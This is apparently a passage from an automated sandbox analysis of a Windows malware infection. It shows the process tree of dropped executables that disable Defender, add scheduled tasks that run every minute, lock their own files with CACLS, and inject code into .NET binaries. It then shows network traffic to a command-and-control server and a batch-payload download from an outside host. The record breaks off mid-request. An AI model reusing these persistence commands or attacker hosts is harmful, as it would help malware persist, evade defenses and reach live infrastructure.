- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:3716
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe71c146f8,0x7ffe71c14708,0x7ffe71c14718
    3⤵
    PID:4852
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,3080358234619567147,7434752836164722549,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:3
    3⤵
    PID:2580
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,3080358234619567147,7434752836164722549,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2
    3⤵
    PID:2956
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,3080358234619567147,7434752836164722549,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2900 /prefetch:8
    3⤵
    PID:3484
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,3080358234619567147,7434752836164722549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3512 /prefetch:1
    3⤵
    PID:2784
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,3080358234619567147,7434752836164722549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1
    3⤵
    PID:4644
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,3080358234619567147,7434752836164722549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4712 /prefetch:1
    3⤵
    PID:5268
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,3080358234619567147,7434752836164722549,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5656 /prefetch:1
    3⤵
    PID:5132
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,3080358234619567147,7434752836164722549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5640 /prefetch:1
    3⤵
    PID:6076
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,3080358234619567147,7434752836164722549,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5452 /prefetch:8
    3⤵
    PID:3732
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,3080358234619567147,7434752836164722549,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5452 /prefetch:8
    3⤵
    PID:4076
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,3080358234619567147,7434752836164722549,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4796 /prefetch:1
    3⤵
    PID:6080
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,3080358234619567147,7434752836164722549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4780 /prefetch:1
    3⤵
    PID:5836
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,3080358234619567147,7434752836164722549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6832 /prefetch:1
    3⤵
    PID:6064
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,3080358234619567147,7434752836164722549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6044 /prefetch:1
    3⤵
    PID:5852
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,3080358234619567147,7434752836164722549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6872 /prefetch:1
    3⤵
    PID:6112
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,3080358234619567147,7434752836164722549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6868 /prefetch:1
    3⤵
    PID:5336

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2540 -ip 2540
1⤵
PID:3236

C:\Users\Admin\AppData\Local\Temp\770.exe
C:\Users\Admin\AppData\Local\Temp\770.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4696
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
  2⤵
  PID:116
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4696 -s 148
  2⤵
  - Program crash
  PID:620

C:\Users\Admin\AppData\Local\Temp\2A8A.exe
C:\Users\Admin\AppData\Local\Temp\2A8A.exe
1⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious use of AdjustPrivilegeToken
PID:1736

C:\Users\Admin\AppData\Local\Temp\2E63.exe
C:\Users\Admin\AppData\Local\Temp\2E63.exe
1⤵
- Checks computer location settings
- Executes dropped EXE
PID:2268
- C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
  "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:5356
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
    3⤵
    - Creates scheduled task(s)
    PID:6040
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit
    3⤵
    PID:2060
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
      4⤵
      PID:5712
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "explothe.exe" /P "Admin:N"
      4⤵
      PID:6136
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "explothe.exe" /P "Admin:R" /E
      4⤵
      PID:6104
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
      4⤵
      PID:4260
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "..\fefffe8cea" /P "Admin:N"
      4⤵
      PID:5832
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "..\fefffe8cea" /P "Admin:R" /E
      4⤵
      PID:1000
- - C:\Windows\SysWOW64\rundll32.exe
    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
    3⤵
    - Loads dropped DLL
    PID:1368

C:\Users\Admin\AppData\Local\Temp\3308.exe
C:\Users\Admin\AppData\Local\Temp\3308.exe
1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
PID:2132
- C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
  "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:5616
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
    3⤵
    - Creates scheduled task(s)
    PID:5736
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\207aa4515d" /P "Admin:N"&&CACLS "..\207aa4515d" /P "Admin:R" /E&&Exit
    3⤵
    PID:5900
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
      4⤵
      PID:5352
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "oneetx.exe" /P "Admin:N"
      4⤵
      PID:1596
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "oneetx.exe" /P "Admin:R" /E
      4⤵
      PID:732
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
      4⤵
      PID:1928
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "..\207aa4515d" /P "Admin:N"
      4⤵
      PID:2340
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "..\207aa4515d" /P "Admin:R" /E
      4⤵
      PID:1456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4656 -ip 4656
1⤵
PID:1812

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4696 -ip 4696
1⤵
PID:1956

C:\Users\Admin\AppData\Local\Temp\372F.exe
C:\Users\Admin\AppData\Local\Temp\372F.exe
1⤵
- Executes dropped EXE
PID:2208
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
  2⤵
  PID:6056
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe71c146f8,0x7ffe71c14708,0x7ffe71c14718
    3⤵
    PID:6120
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
  2⤵
  PID:5856
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe71c146f8,0x7ffe71c14708,0x7ffe71c14718
    3⤵
    PID:2288

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4916 -ip 4916
1⤵
PID:724

C:\Users\Admin\AppData\Local\Temp\475D.exe
C:\Users\Admin\AppData\Local\Temp\475D.exe
1⤵
- Executes dropped EXE
PID:3908

C:\Users\Admin\AppData\Local\Temp\4CBD.exe
C:\Users\Admin\AppData\Local\Temp\4CBD.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4448
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
  2⤵
  PID:5580

C:\Users\Admin\AppData\Local\Temp\5009.exe
C:\Users\Admin\AppData\Local\Temp\5009.exe
1⤵
- Executes dropped EXE
PID:2140

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5368

C:\Users\Admin\AppData\Local\Temp\5308.exe
C:\Users\Admin\AppData\Local\Temp\5308.exe
1⤵
- Executes dropped EXE
PID:5564

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5716

C:\Users\Admin\AppData\Local\Temp\5A1E.exe
C:\Users\Admin\AppData\Local\Temp\5A1E.exe
1⤵
- Executes dropped EXE
PID:6004

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
1⤵
- Executes dropped EXE
PID:3620

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
1⤵
- Executes dropped EXE
PID:3428

Network

DNS

72.32.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

72.32.126.40.in-addr.arpa

IN PTR

Response
DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

126.22.238.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

126.22.238.8.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

241.154.82.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

241.154.82.20.in-addr.arpa

IN PTR

Response
DNS

59.128.231.4.in-addr.arpa

Remote address:

8.8.8.8:53

Request

59.128.231.4.in-addr.arpa

IN PTR

Response
DNS

29.81.57.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

29.81.57.23.in-addr.arpa

IN PTR

Response

29.81.57.23.in-addr.arpa

IN PTR

a23-57-81-29deploystaticakamaitechnologiescom
DNS

26.35.223.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

26.35.223.20.in-addr.arpa

IN PTR

Response
DNS

23.159.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

23.159.190.20.in-addr.arpa

IN PTR

Response
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://wljpvt.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 183
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Oct 2023 20:47:25 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://kprfwlesv.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 235
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Oct 2023 20:47:25 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://rsqdmple.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 297
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Oct 2023 20:47:25 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://upruq.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 334
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Oct 2023 20:47:26 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://fchmtou.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 194
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Oct 2023 20:47:26 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ucplyyrdmy.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 158
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Oct 2023 20:47:26 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 41
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://yrkbb.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 174
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Oct 2023 20:47:27 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://oslfxv.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 151
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Oct 2023 20:47:27 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
DNS

29.68.91.77.in-addr.arpa

Remote address:

8.8.8.8:53

Request

29.68.91.77.in-addr.arpa

IN PTR

Response

29.68.91.77.in-addr.arpa

IN PTR

hosted-by yeezyhostnet
GET

http://77.91.68.52/fuza/3.bat

Remote address:

77.91.68.52:80

Request

GET /fuza/3.bat HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 77.91.68.52

Response

HTTP/1.1 200 OK

Date: Thu, 12 Oct 2023 20:47:26 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Wed, 11 Oct 2023 23:08:44 GMT
ETag: "4f-60778e7a46265"
Accept-Ranges: bytes
Content-Length: 79
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
DNS

52.68.91.77.in-addr.arpa

Remote address:

8.8.8.8:53

Request

52.68.91.77.in-addr.arpa

IN PTR

Response

52.68.91.77.in-addr.arpa

IN PTR

hosted-by yeezyhostnet
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://suqweuawhv.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 180
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Oct 2023 20:47:36 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://etraykeh.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 335
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Oct 2023 20:47:36 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://qeviucsqwr.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 155
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Oct 2023 20:47:37 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://irdjuuce.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 307
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Oct 2023 20:47:37 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://sqhsyyqj.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 284
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Oct 2023 20:47:38 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://horyqhoxyy.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 233
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Oct 2023 20:47:38 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 40
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://vuqcojeaix.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 126
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Oct 2023 20:47:39 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
